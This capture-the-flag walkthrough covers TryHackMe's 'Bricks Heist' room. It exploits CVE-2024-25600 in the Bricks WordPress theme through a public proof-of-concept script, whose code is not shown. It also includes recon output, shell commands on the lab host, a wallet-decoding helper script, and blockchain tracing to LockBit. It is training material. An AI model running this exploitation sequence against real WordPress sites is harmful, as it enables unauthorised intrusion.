TryHack3M: Bricks Heist (TryHackMe) - CVE-2024-25600 (Bricks Builder RCE) & OSINT - crypto wallets

Introduction
TryHack3M: Bricks Heist is a TryHackMe challenge centered on two core skills: exploiting a known CVE in a WordPress plugin and performing blockchain OSINT to trace a threat actor. The scenario follows a compromised web server belonging to Brick Press Media Co., where our job is to hack back in, understand what happened, and identify who was behind it.
The primary attack vector is CVE-2024-25600, an unauthenticated Remote Code Execution vulnerability affecting Bricks Builder ≤ 1.9.6 — a popular WordPress page builder theme. The flaw exists in the /wp-json/bricks/v1/render_element REST API endpoint, which fails to properly restrict PHP code execution. An attacker can abuse this without any credentials to achieve full server-level code execution.
Once inside, the challenge shifts to threat intelligence and blockchain OSINT — tracing a Bitcoin wallet found in a cryptominer's log file back to a sanctioned ransomware group using public blockchain explorers and OFAC records.
Tools used: nmap, gobuster, curl, CVE-2024-25600 PoC (Python), CyberChef, Blockchain Explorer
OWASP Mapping: A06:2021 – Vulnerable and Outdated Components
CWE: CWE-94 – Improper Control of Generation of Code ('Code Injection')
Challenge
From Three Million Bricks to Three Million Transactions!
Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they've lost access.
Can you hack back the server and identify what happened there?
Note: Add MACHINE_IP bricks.thm to your /etc/hosts file.
Answer the questions below
What is the content of the hidden .txt file in the web folder? THM{fl46_650c844110baced87e1606453b93f22a}
nano /etc/hosts
nmap -sV -p- bricks.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2026-02-24 18:22 GMT
mass_dns: warning: Unable to open /etc/resolv.conf. Try using --system-dns or specify valid servers with --dns-servers
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for bricks.thm (10.114.165.204)
Host is up (0.0059s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
80/tcp open http WebSockify Python/3.8.10
443/tcp open ssl/ssl Apache httpd (SSL-only mode)
3306/tcp open mysql MySQL (unauthorized)
gobuster dir -u https://bricks.thm -w /usr/share/wordlists/dirb/common.txt -x php,html,txt -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://bricks.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 199]
/.hta (Status: 403) [Size: 199]
/.hta.php (Status: 403) [Size: 199]
/.hta.html (Status: 403) [Size: 199]
/.hta.txt (Status: 403) [Size: 199]
/.htaccess (Status: 403) [Size: 199]
/.htaccess.php (Status: 403) [Size: 199]
/.htaccess.html (Status: 403) [Size: 199]
/.htaccess.txt (Status: 403) [Size: 199]
/.htpasswd (Status: 403) [Size: 199]
/.htpasswd.html (Status: 403) [Size: 199]
/.htpasswd.php (Status: 403) [Size: 199]
/.htpasswd.txt (Status: 403) [Size: 199]
/0 (Status: 301) [Size: 0] [--> https://bricks.thm/0/]
/admin (Status: 302) [Size: 0] [--> https://bricks.thm/wp-admin/]
/atom (Status: 301) [Size: 0] [--> https://bricks.thm/feed/atom/]
/b (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
/B (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
/br (Status: 301) [Size: 0] [--> https://bricks.thm/2024/04/02/brick-by-brick/]
/cgi-bin/.html (Status: 403) [Size: 199]
/dashboard (Status: 302) [Size: 0] [--> https://bricks.thm/wp-admin/]
/embed (Status: 301) [Size: 0] [--> https://bricks.thm/embed/]
/favicon.ico (Status: 302) [Size: 0] [--> https://bricks.thm/wp-includes/images/w-logo-blue-white-bg.png]
/feed (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/index.php (Status: 301) [Size: 0] [--> https://bricks.thm/]
/index.php (Status: 301) [Size: 0] [--> https://bricks.thm/]
/license.txt (Status: 200) [Size: 19915]
/login.php (Status: 302) [Size: 0] [--> https://bricks.thm/wp-login.php]
/login (Status: 302) [Size: 0] [--> https://bricks.thm/wp-login.php]
/page1 (Status: 301) [Size: 0] [--> https://bricks.thm/]
/phpmyadmin (Status: 301) [Size: 238] [--> https://bricks.thm/phpmyadmin/]
/rdf (Status: 301) [Size: 0] [--> https://bricks.thm/feed/rdf/]
/readme.html (Status: 200) [Size: 7401]
/robots.txt (Status: 200) [Size: 67]
/robots.txt (Status: 200) [Size: 67]
/rss (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/rss2 (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/s (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
/S (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
/sa (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
/sam (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
/sample (Status: 301) [Size: 0] [--> https://bricks.thm/sample-page/]
/server-info (Status: 403) [Size: 199]
/server-status (Status: 403) [Size: 199]
/wp-admin (Status: 301) [Size: 236] [--> https://bricks.thm/wp-admin/]
/wp-app.php (Status: 403) [Size: 0]
/wp-atom.php (Status: 301) [Size: 0] [--> https://bricks.thm/feed/atom/]
/wp-config.php (Status: 200) [Size: 0]
/wp-commentsrss2.php (Status: 301) [Size: 0] [--> https://bricks.thm/comments/feed/]
/wp-content (Status: 301) [Size: 238] [--> https://bricks.thm/wp-content/]
/wp-cron.php (Status: 200) [Size: 0]
/wp-feed.php (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/wp-includes (Status: 301) [Size: 239] [--> https://bricks.thm/wp-includes/]
/wp-links-opml.php (Status: 200) [Size: 227]
/wp-load.php (Status: 200) [Size: 0]
/wp-login.php (Status: 200) [Size: 4042]
/wp-mail.php (Status: 403) [Size: 2478]
/wp-rdf.php (Status: 301) [Size: 0] [--> https://bricks.thm/feed/rdf/]
/wp-rss.php (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/wp-register.php (Status: 301) [Size: 0] [--> https://bricks.thm/wp-login.php?action=register]
/wp-settings.php (Status: 500) [Size: 0]
/wp-rss2.php (Status: 301) [Size: 0] [--> https://bricks.thm/feed/]
/wp-signup.php (Status: 302) [Size: 0] [--> https://bricks.thm/wp-login.php?action=register]
/xmlrpc.php (Status: 405) [Size: 42]
/xmlrpc.php (Status: 405) [Size: 42]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
According to Claude:
This is almost certainly running Bricks Builder (a WordPress page builder). There's a well-known critical RCE vulnerability: CVE-2024-25600 — an unauthenticated remote code execution in Bricks Builder ≤ 1.9.6.
curl -k https://bricks.thm/wp-content/themes/bricks/style.css 2>/dev/null | head -5
/*
Theme Name: Bricks
Theme URI: https://bricksbuilder.io/
Author: Bricks
Author URI: https://bricksbuilder.io/
In the next step, I used the public Python PoC script for CVE-2024-25600. You'll have to copy it and save it as a local Python script to run the exploit.
- Remember, for this step to work, you have to add bricks.thm to /etc/hosts.
nano script.py
python3 exploit.py -u https://bricks.thm
Shell> ls
650c844110baced87e1606453b93f22a.txt
index.php
kod
license.txt
phpmyadmin
readme.html
wp-activate.php
wp-admin
wp-blog-header.php
wp-comments-post.php
wp-config-sample.php
wp-config.php
wp-content
wp-cron.php
wp-includes
wp-links-opml.php
wp-load.php
wp-login.php
wp-mail.php
wp-settings.php
wp-signup.php
wp-trackback.php
xmlrpc.php
Shell> cat 650c844110baced87e1606453b93f22a.txt
THM{fl46_650c844110baced87e1606453b93f22a}
What is the name of the suspicious process? nm-inet-dialog
find /lib/NetworkManager/ -type f 2>/dev/null
/lib/NetworkManager/nm-openvpn-auth-dialog
/lib/NetworkManager/nm-pptp-auth-dialog
/lib/NetworkManager/nm-initrd-generator
/lib/NetworkManager/nm-dispatcher
/lib/NetworkManager/VPN/nm-pptp-service.name
/lib/NetworkManager/VPN/nm-openvpn-service.name
/lib/NetworkManager/nm-iface-helper
/lib/NetworkManager/conf.d/10-globally-managed-devices.conf
/lib/NetworkManager/conf.d/no-mac-addr-change.conf
/lib/NetworkManager/conf.d/10-dns-resolved.conf
/lib/NetworkManager/nm-openvpn-service
/lib/NetworkManager/nm-dhcp-helper
/lib/NetworkManager/nm-pptp-service
/lib/NetworkManager/nm-openvpn-service-openvpn-helper
/lib/NetworkManager/nm-inet-dialog
/lib/NetworkManager/inet.conf
What is the service name affiliated with the suspicious process? ubuntu.service
Shell> systemctl | grep running
proc-sys-fs-binfmt_misc.automount loaded active running Arbitrary Executable File Formats File System Automount Point
acpid.path loaded active running ACPI Events Check
init.scope loaded active running System and Service Manager
session-c1.scope loaded active running Session c1 of user lightdm
accounts-daemon.service loaded active running Accounts Service
acpid.service loaded active running ACPI event daemon
atd.service loaded active running Deferred execution scheduler
avahi-daemon.service loaded active running Avahi mDNS/DNS-SD Stack
badr.service loaded active running Badr Service
cron.service loaded active running Regular background program processing daemon
cups-browsed.service loaded active running Make remote CUPS printers available locally
cups.service loaded active running CUPS Scheduler
dbus.service loaded active running D-Bus System Message Bus
getty@tty1.service loaded active running Getty on tty1
httpd.service loaded active running LSB: starts Apache Web Server
irqbalance.service loaded active running irqbalance daemon
kerneloops.service loaded active running Tool to automatically collect and submit kernel crash signatures
lightdm.service loaded active running Light Display Manager
ModemManager.service loaded active running Modem Manager
multipathd.service loaded active running Device-Mapper Multipath Device Controller
mysqld.service loaded active running LSB: start and stop MySQL
networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd
NetworkManager.service loaded active running Network Manager
polkit.service loaded active running Authorization Manager
rsyslog.service loaded active running System Logging Service
rtkit-daemon.service loaded active running RealtimeKit Scheduling Policy Service
serial-getty@ttyS0.service loaded active running Serial Getty on ttyS0
snap.amazon-ssm-agent.amazon-ssm-agent.service loaded active running Service for snap application amazon-ssm-agent.amazon-ssm-agent
snapd.service loaded active running Snap Daemon
ssh.service loaded active running OpenBSD Secure Shell server
switcheroo-control.service loaded active running Switcheroo Control Proxy service
systemd-journald.service loaded active running Journal Service
systemd-logind.service loaded active running Login Service
systemd-networkd.service loaded active running Network Service
systemd-resolved.service loaded active running Network Name Resolution
systemd-timesyncd.service loaded active running Network Time Synchronization
systemd-udevd.service loaded active running udev Kernel Device Manager
ubuntu.service loaded active running TRYHACK3M
udisks2.service loaded active running Disk Manager
unattended-upgrades.service loaded active running Unattended Upgrades Shutdown
upower.service loaded active running Daemon for power management
user@1000.service loaded active running User Manager for UID 1000
user@114.service loaded active running User Manager for UID 114
whoopsie.service loaded active running crash report submission daemon
wpa_supplicant.service loaded active running WPA supplicant
acpid.socket loaded active running ACPID Listen Socket
avahi-daemon.socket loaded active running Avahi mDNS/DNS-SD Stack Activation Socket
cups.socket loaded active running CUPS Scheduler
dbus.socket loaded active running D-Bus System Message Bus Socket
multipathd.socket loaded active running multipathd control socket
snapd.socket loaded active running Socket activation for snappy daemon
syslog.socket loaded active running Syslog Socket
systemd-journald-audit.socket loaded active running Journal Audit Socket
systemd-journald-dev-log.socket loaded active running Journal Socket (/dev/log)
systemd-journald.socket loaded active running Journal Socket
systemd-networkd.socket loaded active running Network Service Netlink Socket
systemd-udevd-control.socket loaded active running udev Control Socket
systemd-udevd-kernel.socket loaded active running udev Kernel Socket
What is the log file name of the miner instance? inet.conf
cat /lib/NetworkManager/inet.conf
2024-04-11 10:54:02,579 [*] Miner()
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2025-11-01 15:36:36,211 [*] confbak: Ready!
2025-11-01 15:36:36,211 [*] Status: Mining!
2025-11-01 15:36:40,214 [*] Miner()
2025-11-01 15:36:40,214 [*] Bitcoin Miner Thread Started
2025-11-01 15:36:40,214 [*] Status: Mining!
2025-11-01 15:36:42,216 [*] Miner()
2025-11-01 15:48:50,641 [*] Miner()
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2025-11-01 15:49:57,403 [*] confbak: Ready!
2025-11-01 15:49:57,404 [*] Status: Mining!
2025-11-01 15:50:01,412 [*] Miner()
2025-11-01 15:50:01,412 [*] Bitcoin Miner Thread Started
2025-11-01 15:50:01,412 [*] Status: Mining!
2025-11-01 15:50:57,520 [*] Miner()
2025-11-01 15:50:59,522 [*] Miner()
2025-11-01 15:51:01,524 [*] Miner()
ID: 5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d
2025-11-05 21:57:43,607 [*] confbak: Ready!
2025-11-05 21:57:43,607 [*] Status: Mining!
2025-11-05 21:57:47,612 [*] Miner()
2025-11-05 21:57:47,612 [*] Bitcoin Miner Thread Started
2025-11-05 21:57:47,612 [*] Status: Mining!
What is the wallet address of the miner instance? bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa
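The ID field in inet.conf is hex wrapping two layers of base64, and the decoded text holds more than one bc1 string. The script below is an added example (not part of the original writeup or the challenge): it pulls every ID line out of a log excerpt copied from the page, peels the three layers, splits the result into candidate addresses, and runs a BIP-173 bech32 checksum on each so that a look-alike string can be separated from a well-formed address before it is looked up on a blockchain explorer. The helper names and the SAMPLE_LOG excerpt are my own; MINER_ID_HEX is the value shown in the log above.

```python
import base64
import re

BECH32_CHARSET = "qpzry9x8gf2tvdw0s3jn54khce6mua7l"  # BIP-173 alphabet (no 1, b, i, o)
MINER_ID_HEX = "5757314e65474e5962484a4f656d787457544e424e574648555446684d3070735930684b616c70555a7a566b52335276546b686b65575248647a525a57466f77546b64334d6b347a526d685a6255313459316873636b35366247315a4d304531595564476130355864486c6157454a3557544a564e453959556e4a685246497a5932355363303948526a4a6b52464a7a546d706b65466c525054303d"
# Three lines of /lib/NetworkManager/inet.conf as shown on the page (constructed sample for this example).
SAMPLE_LOG = (
    "2024-04-11 10:54:02,579 [*] Miner()\n"
    f"ID: {MINER_ID_HEX}\n"
    "2025-11-01 15:36:36,211 [*] confbak: Ready!\n"
)

def decode_miner_id(hex_id):
    """Peel the miner's ID field: hex -> base64 text -> base64 text -> ASCII."""
    layer1 = bytes.fromhex(hex_id)      # the hex hides a base64 string...
    layer2 = base64.b64decode(layer1)   # ...which hides another base64 string
    return base64.b64decode(layer2).decode("ascii")

def bech32_polymod(values):
    """BIP-173 checksum polynomial over a list of 5-bit values."""
    gen = (0x3B6A57B2, 0x26508E6D, 0x1EA119FA, 0x3D4233DD, 0x2A1462B3)
    chk = 1
    for v in values:
        top = chk >> 25
        chk = ((chk & 0x1FFFFFF) << 5) ^ v
        for i in range(5):
            if (top >> i) & 1:
                chk ^= gen[i]
    return chk

def is_valid_bech32_address(addr):
    """True only for a mainnet bech32 (witness v0, bc1q...) address whose checksum verifies."""
    hrp, _sep, data = addr.lower().rpartition("1")
    if hrp != "bc" or len(data) < 6 or any(c not in BECH32_CHARSET for c in data):
        return False
    hrp_expanded = [ord(c) >> 5 for c in hrp] + [0] + [ord(c) & 31 for c in hrp]
    return bech32_polymod(hrp_expanded + [BECH32_CHARSET.index(c) for c in data]) == 1

def extract_wallets(log_text):
    """Map every bc1 candidate found in the decoded ID fields to its checksum result."""
    results = {}
    for hex_id in set(re.findall(r"^ID:\s*([0-9a-fA-F]+)\s*$", log_text, re.M)):
        decoded = decode_miner_id(hex_id)
        # 'b' is outside the bech32 alphabet, so a greedy class match ends exactly where the next "bc1" starts.
        for cand in re.findall(r"bc1[" + BECH32_CHARSET + r"]+", decoded):
            results[cand] = is_valid_bech32_address(cand)
    return results

if __name__ == "__main__": print(extract_wallets(SAMPLE_LOG))
```

Only candidates whose checksum verifies are worth submitting to an explorer or checking against the OFAC list; the checksum catches any single-character or short-burst alteration of an address.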
The wallet address used has been involved in transactions between wallets belonging to which threat group? LockBit
The wallet bc1qyk79fcp9hd5kreprce89tkh4wrtl8avt4l67qa transacted with bc1q5jqgm7nvrhaw2rh2vk0dk8e4gg5g373g0vz07r, which is sanctioned by the US Treasury OFAC and linked to the LockBit ransomware group. You can verify at:
https://ofac.treasury.gov/recent-actions/20240220
Conclusion
This challenge demonstrated how a single unpatched plugin can serve as the entry point for a full server compromise. CVE-2024-25600 is particularly dangerous because it requires zero authentication — any exposed WordPress site running Bricks Builder ≤ 1.9.6 is vulnerable to complete RCE with a single POST request.
Once inside, we discovered the attacker had deployed a Bitcoin cryptominer disguised as a legitimate NetworkManager binary (nm-inet-dialog), persisted via a systemd service (ubuntu.service), and logged mining activity to /lib/NetworkManager/inet.conf. Decoding the obfuscated wallet ID using hex and base64 revealed a Bitcoin address that, when traced through blockchain OSINT and cross-referenced against OFAC sanctions records, linked the attacker's infrastructure to the LockBit ransomware group.
Key takeaways:
Always keep WordPress themes and plugins updated — CVE-2024-25600 had a patch available
Cryptominers often masquerade as system binaries to avoid detection
Blockchain transactions are pseudonymous, not anonymous — OSINT can trace wallets to known threat actors through public sanction databases like OFAC




